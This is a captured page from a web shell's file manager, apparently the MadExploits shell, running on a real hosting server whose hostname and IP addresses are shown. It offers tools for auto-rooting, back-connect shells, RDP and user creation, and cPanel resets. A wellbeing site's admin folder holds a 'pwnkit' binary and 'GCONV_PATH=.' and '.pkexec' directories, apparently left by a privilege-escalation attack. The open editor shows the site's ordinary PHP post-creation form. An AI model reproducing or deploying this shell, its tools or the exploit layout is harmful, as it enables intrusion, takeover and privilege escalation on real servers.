Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.147.237.182
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
auswellbeing /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
auswellbeing
[ DIR ]
drwxr-xr-x
config.ini
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
old
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
about.php
3.54
KB
-rw-r--r--
adjustment_support.php
48
B
-rw-r--r--
blog.php
2.65
KB
-rw-r--r--
check.php
718
B
-rw-r--r--
counselling_for_carers.php
48
B
-rw-r--r--
create.php
7.88
KB
-rw-r--r--
delete.php
1.42
KB
-rw-r--r--
front.check.login.php
740
B
-rw-r--r--
index.php
9.44
KB
-rw-r--r--
mindfulness_practice.php
48
B
-rw-r--r--
multilingual.php
48
B
-rw-r--r--
personal_development.php
48
B
-rw-r--r--
post.php
3.53
KB
-rw-r--r--
process.php
3.47
KB
-rw-r--r--
process_new.php
3.14
KB
-rw-r--r--
process_seo.php
1
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
relationship_skills.php
48
B
-rw-r--r--
service-data-template.php
2.57
KB
-rw-r--r--
service-data.php
1.45
KB
-rw-r--r--
services.php
3.47
KB
-rw-r--r--
update.php
10.89
KB
-rw-r--r--
upload.image.php
540
B
-rw-r--r--
upload.image.sm.php
561
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : create.php
<?php require_once "config.ini/login.check.php"; include( "includes/header.php");?> <?php $ref = $type = ''; if(isset($_GET['ref'])) { if(!empty($_GET['ref'])) { $ref = $tool->cleanInputVal($_GET['ref']); } } if(isset($_GET['type'])) { if(!empty($_GET['type'])) { $type = $tool->cleanInputVal($_GET['type']); } } ?> <div class="back-w p-tb40""> <div class="container-fluid"> <div class="container"> <form action="process_new.php" method="post" class="form fmm-1" enctype="multipart/form-data"> <?php if($type == 'slider'){ ?> <h2 class="text-center text-dark form-hddd" > Add New Slider Image </h2> <div class="form-group row"> <label for="heading" class="col-md-4 lead pt-2" style="top:10px;">Heading</label> <input type="text" class="col-md-8" id="heading" name="heading" placeholder="Write here..."> </div> <div class="form-group row"> <div class="col-md-4" id="uploaded_image"> </div> <div class="col-md-8 text-center" style="position:relative;"> <img src="" id="demoImage" class="img-fluid w-25"> </div> </div> <div class="form-group row"> <label for="photo" class="col-md-4 lead pt-2" style="top:10px;">Select Image</label> <input type="file" class="col-md-8 file-control" id="photo" name="photo" /> <input type="hidden" class="col-md-12" id="imagePath" name="path"> </div> <?php } else if($type == 'services'){ ?> <h2 class="text-center text-dark form-hddd"> Add New Service </h2> <div class="form-group row"> <label for="heading" class="col-md-4 lead pt-2" style="top:10px;">Heading</label> <input type="text" class="col-md-8" id="heading" name="heading" placeholder="Write here..."> </div> <div class="form-group row"> <div class="col-md-4" id="uploaded_image_sm"> </div> <div class="col-md-8 text-center" style="position:relative;"> <img src="" id="demoImage_sm" class="img-fluid w-25"> </div> </div> <div class="form-group row"> <label for="photo_sm" class="col-md-4 lead pt-2" style="top:10px;">Select Image(Small)</label> <input type="file" class="col-md-8 file-control" id="photo_sm" name="photo_sm" /> <input type="hidden" class="col-md-12" id="imagePath_sm" name="path_sm"> </div> <div class="form-group row"> <div class="col-md-4" id="uploaded_image"> </div> <div class="col-md-8 text-center" style="position:relative;"> <img src="" id="demoImage" class="img-fluid w-25"> </div> </div> <div class="form-group row"> <label for="photo" class="col-md-4 lead pt-2" style="top:10px;">Select Image(Large)</label> <input type="file" class="col-md-8 file-control" id="photo" name="photo" /> <input type="hidden" class="col-md-12" id="imagePath" name="path"> </div> <div class="form-group row"> <!-- <label for="content" class="col-md-4 lead">Content</label> --> <label for="content" class="lead" style="top:10px;padding-left:15px;">Content</label> <textarea class="col-md-12 editor" id="content" name="content" placeholder="Write here..."></textarea> </div> <hr> <h2 class="text-center text-dark form-hddd"> SEO / Meta Settings </h2> <div class="form-group row"> <label for="service_page_name" id="urlExistContainer" class="col-md-4 lead pt-2" style="top:10px;"> Service Page Vanity URL </label> <input type="text" class="col-md-8" name="service_page_name" id="service_page_name" placeholder="Write here..."> </div> <div class="form-group row"> <label for="title" class="col-md-4 lead pt-2" style="top:10px;">SEO Title</label> <input type="text" class="col-md-8" name="title" id="title" placeholder="Write here..."> </div> <div class="form-group row"> <label for="description" class="col-md-12 lead pb-2" >SEO Description</label> <textarea name="description" class="col-md-12 form-control" rows="5" id="description" placeholder="Write here..."></textarea> </div> <div class="form-group row"> <label for="keywords" class="col-md-12 lead pb-2" >SEO Keywords</label> <textarea name="keywords" class="col-md-12 form-control" rows="5" id="keywords" placeholder="Write here..."></textarea> </div> <?php } else if($type == 'blog'){ ?> <h2 class="text-center form_heading bg-info" style="color:#444444;"> Create New Post </h2> <div class="form-group row"> <label for="heading" class="col-md-4 lead pt-2" style="top:10px;">Post Heading</label> <input type="text" class="col-md-8" id="heading" name="heading" placeholder="Write here..."> </div> <div class="form-group row"> <div class="col-md-4" id="uploaded_image"> </div> <div class="col-md-8 text-center" style="position:relative;"> <img src="" id="demoImage" class="img-fluid w-25"> </div> </div> <div class="form-group row"> <label for="photo" class="col-md-4 lead pt-2" style="top:10px;">Post Image</label> <input type="file" class="col-md-8 file-control" id="photo" name="photo" /> <input type="hidden" class="col-md-12" id="imagePath" name="path" value=""> </div> <div class="form-group row"> <label for="post_short_summery" class="col-md-12 lead" style="top:10px;">Post Summary</label> <br><br> <textarea class="col-md-12 editor" id="post_short_summery" name="post_short_summery" placeholder="Write here..."></textarea> </div> <div class="form-group row"> <label for="post_long_summery" class="col-md-12 lead" style="top:10px;">Post Content</label> <br><br> <textarea class="col-md-12 editor" id="post_long_summery" name="post_long_summery" placeholder="Write here..."></textarea> </div> <hr> <h2 class="text-center text-dark form-hddd"> SEO / Meta Settings </h2> <div class="form-group row"> <label for="title" class="col-md-4 lead pt-2" style="top:10px;">SEO Title</label> <input type="text" class="col-md-8" name="title" id="title" placeholder="Write here..."> </div> <div class="form-group row"> <label for="description" class="col-md-12 lead pb-2" >SEO Description</label> <textarea name="description" class="col-md-12 form-control" rows="5" id="description" placeholder="Write here..."></textarea> </div> <div class="form-group row"> <label for="keywords" class="col-md-12 lead pb-2" >SEO Keywords</label> <textarea name="keywords" class="col-md-12 form-control" rows="5" id="keywords" placeholder="Write here..."></textarea> </div> <?php } else if($type == 'gallery'){ ?> gallery <?php } ?> <!-- images/service-icons/relationship.png --> <div class="row"> <div class="col-md-4"></div> <div class="col-md-4 lfrt-p"> <input type="hidden" name="action" value="create"> <input type="hidden" name="type" value="<?=$type ?>"> <button type="submit" class="btn btn-primary w-100 btn-block btn-lg"> <i class="fa fa-save"></i> Save </button> <div class="col-md-4"></div> </div> </div> </form> </div> </div> </div> <?php include( "includes/footer.php");?>
Close